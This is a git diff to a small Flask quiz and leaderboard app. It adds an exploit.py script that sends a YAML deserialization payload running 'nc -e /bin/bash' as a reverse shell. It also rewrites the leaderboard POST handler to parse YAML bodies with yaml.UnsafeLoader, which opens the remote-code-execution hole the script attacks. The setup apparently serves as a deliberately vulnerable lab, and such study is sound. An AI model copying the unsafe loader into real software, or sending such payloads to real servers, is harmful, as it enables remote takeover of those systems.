diff --git a/.gitignore b/.gitignore
new file mode 100644
index 0000000..50a0482
--- /dev/null
+++ b/.gitignore
@@ -0,0 +1 @@
+leaderboard.yaml
diff --git a/exploit.py b/exploit.py
new file mode 100644
index 0000000..be244c8
--- /dev/null
+++ b/exploit.py
@@ -0,0 +1,11 @@
+import requests
+
+malicious_yaml = """
+!!python/object/apply:os.system ["nc -e /bin/bash 127.0.0.1 1111"]
+"""
+url = "http://127.0.0.1:8080/api/leaderboard"
+headers = {
+    "Content-Type": "text/yaml"
+}
+response = requests.post(url, headers=headers, data=malicious_yaml)
+print(response.text)
diff --git a/flask_base/app.py b/flask_base/app.py
index 9c6e3f3..604ed45 100644
--- a/flask_base/app.py
+++ b/flask_base/app.py
@@ -13,17 +13,27 @@ if not os.path.exists(LEADERBOARD_FILE):
 
 def read_leaderboard():
     with open(LEADERBOARD_FILE, 'r') as f:
-        return yaml.load(f, Loader=yaml.UnsafeLoader) or []
+        return yaml.safe_load(f) or []
 
 def write_leaderboard(data):
+    print(data)
     with open(LEADERBOARD_FILE, 'w') as f:
         yaml.safe_dump(data, f)
 
 @app.route('/api/leaderboard', methods=['POST'])
 def add_to_leaderboard():
-    new_entry = request.json
+    if request.content_type == 'text/yaml' or request.content_type == 'application/yaml':
+        try:
+            new_entry = yaml.load(request.data, Loader=yaml.UnsafeLoader)
+        except yaml.YAMLError:
+            return jsonify({'error': 'Invalid YAML format'}), 400
+    else:
+        new_entry = request.json
+
+    print(new_entry)
     if not new_entry or 'name' not in new_entry or 'score' not in new_entry:
         return jsonify({'error': 'Name and score are required'}), 400
+
     leaderboard = read_leaderboard()
     leaderboard.append(new_entry)
     write_leaderboard(leaderboard)
@@ -38,19 +48,18 @@ def get_leaderboard():
 @app.route('/questions')
 def show_questions():
     with open('./data/quizz.json', 'r') as file:
-        #questions = json.load(file)["outils_list"]
         questions = json.load(file)
     return render_template('quiz.html', questions=questions)
   
-
-
 @app.route('/')
 def main():
     return render_template('index.html')
 
 @app.route('/pokemon')
 def poke():
-    return render_template('pokemon.html')
+    with open('./data/softwares.json', 'r') as file:
+        softwares = json.load(file)["outils_list"]
+    return render_template('pokemon.html', data=softwares)
 
 @app.route('/PAI')
 def pai():